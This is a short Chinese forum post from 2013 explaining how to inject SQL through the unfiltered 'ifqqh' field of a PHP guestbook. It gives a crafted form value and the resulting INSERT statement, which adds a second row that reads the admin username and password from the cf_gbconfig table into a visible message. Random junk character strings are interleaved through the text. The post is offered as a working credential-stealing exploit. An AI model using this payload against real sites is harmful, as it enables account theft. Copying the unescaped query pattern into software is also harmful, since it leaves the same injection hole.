留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。9 x6 z& j( S, J% k
# k1 p" w8 m4 I$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
& p' [3 E+ O! b+ L U* }2 r$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响( v. d5 N* X( N; z' P
7 r, I4 N$ K% }* u3 U. }: F8 Q提交的时候把ifqqh的值改一下。变成 n/ x/ ^0 W4 i
1 p9 y9 `1 u0 `1 `( @<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
2 V& E3 ]! }& b! B2 C
o1 }& s% x5 X* _这样SQL插入语句就变了.& [+ k& l7 t, U9 N& O
, a8 l4 N! w) z' Z6 u# i8 C4 Pinsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)7 P" L3 O) [9 }
! Z* |( o j# l* q, D3 N构造了另外一句SQL。并且把帐号密码读出来。
( V0 L A2 H5 p! F6 D6 f1 t! I7 ?, }5 E6 E6 i5 y
|
发表于 2013-2-19 08:10:11
收藏
支持
反对